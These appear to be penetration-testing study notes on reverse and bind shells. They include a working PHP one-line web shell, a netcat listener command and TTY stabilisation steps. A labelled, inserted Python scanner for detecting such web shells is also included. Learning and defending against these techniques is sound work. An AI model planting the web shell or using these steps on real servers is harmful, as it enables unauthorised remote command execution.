Type of Shell
- Shell (Normal Shell)
- Reverse Shell (target is forced to execute code/task that connects back to your computer)
- Bind Shell (target is forced to execute code that starts a listener attached to a shell directly on the target) -- limited because a firewall on the target often blocks the inbound connection
Tools
- Netcat ---> [[Red Team/4 - Exploitation/Shell & Reverse Shell/2 - Listeners/• Netcat]]
- Socat ---> [[• Socat (Encrypted)]]
- Multi/Handler (Metasploit) ---> [[• Multi Handler]]
Web Shell
As PHP is still the most common server-side scripting language, let's have a look at some simple code for this.
In a very basic one-line format:
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
This will take a GET parameter from the URL and execute it on the system with shell_exec(). Essentially, this means that any command we enter in the URL after ?cmd= will be executed on the system -- be it Windows or Linux. The "pre" elements ensure that the results are formatted correctly on the page. Let's see this in action:
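As an added defender-side example (not part of these notes), a small Python scanner that flags PHP files in a webroot where a command-execution sink is fed from a request parameter, which is exactly the shape of the one-liner above; it also follows one level of variable assignment. The sink and source lists and the sample files are this example's own constructed assumptions.

```python
import re

# Command-execution sinks a PHP web shell typically calls (assumed list, not exhaustive).
SINKS = ("shell_exec", "exec", "system", "passthru", "popen", "proc_open")
# Request superglobals: input fully controlled by whoever sends the request.
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

# sink( args ), allowing one level of nested parentheses inside the args.
SINK_RE = re.compile(
    r"\b(" + "|".join(SINKS) + r")\s*\(((?:[^()]|\([^()]*\))*)\)", re.IGNORECASE)
# $var = $_GET[...] marks $var as request-controlled as well.
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*(\$_(?:GET|POST|REQUEST|COOKIE))\b")


def find_webshell_sinks(php_source):
    """Return (line_number, sink, origin) for every sink call whose arguments
    mention a request superglobal or a variable assigned from one."""
    tainted = {s: s for s in SOURCES}          # token -> originating source
    for m in ASSIGN_RE.finditer(php_source):   # flow-insensitive, whole file
        tainted[m.group(1)] = m.group(2)
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in SINK_RE.finditer(line):
            sink, args = m.group(1).lower(), m.group(2)
            for token, origin in tainted.items():
                if re.search(re.escape(token) + r"\b", args):
                    hits.append((lineno, sink, origin))
                    break
    return hits


def scan_files(files):
    """Scan a {path: content} mapping (stands in for walking a webroot)."""
    return {p: h for p, c in files.items() if (h := find_webshell_sinks(c))}


# Constructed samples: the one-liner from the notes, a benign script, and a
# variant that stages the parameter in a variable before calling system().
SAMPLE_FILES = {
    "uploads/cmd.php": '<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>',
    "index.php": '<?php echo htmlspecialchars($_GET["name"] ?? "guest"); ?>',
    "lib/backup.php": "<?php\n$c = $_POST['c'];\nsystem($c);\n?>",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for lineno, sink, origin in hits:
            print(f"{path}:{lineno}: {sink}() receives {origin}")
```

Pattern matching like this catches the common drop-in shells; it is not taint tracking, so pair it with file-integrity monitoring of the webroot and disabling unused exec functions in php.ini.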
Creating Shell
- Link Number 1
- Link Number 2
Shell Stabilisation
Netcat shells are unstable by default: pressing Ctrl + C kills the whole thing. They are non-interactive, and often have strange formatting errors. This is due to netcat "shells" really being processes running inside a terminal, rather than being bona fide terminals in their own right. Fortunately, there are many ways to stabilise netcat shells on Linux systems. We'll be looking at three here. Stabilisation of Windows reverse shells tends to be significantly harder; however, the second technique that we'll be covering here is particularly useful for it.
Technique 1 (Python)
The first technique we'll be discussing is applicable only to Linux boxes, as they will nearly always have Python installed by default. This is a three-stage process:
- The first thing to do is use python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better-featured bash shell; note that some targets may need the version of Python specified. If this is the case, replace python with python2 or python3 as required. At this point our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.
- Step two is: export TERM=xterm -- this will give us access to term commands such as clear.
- Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
The full technique can be seen here:
Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
Technique 2 (rlwrap)
rlwrap is a program which, in simple terms, gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell; however, some manual stabilisation must still be utilised if you want to be able to use Ctrl + C inside the shell. rlwrap is not installed by default on Kali, so first install it with sudo apt install rlwrap. To use rlwrap, we invoke a slightly different listener:
rlwrap nc -lvnp <port>
Prepending our netcat listener with "rlwrap" gives us a much more fully featured shell. This technique is particularly useful when dealing with Windows shells, which are otherwise notoriously difficult to stabilise. When dealing with a Linux target, it's possible to completely stabilise by using the same trick as in step three of the previous technique: background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilise and re-enter the shell.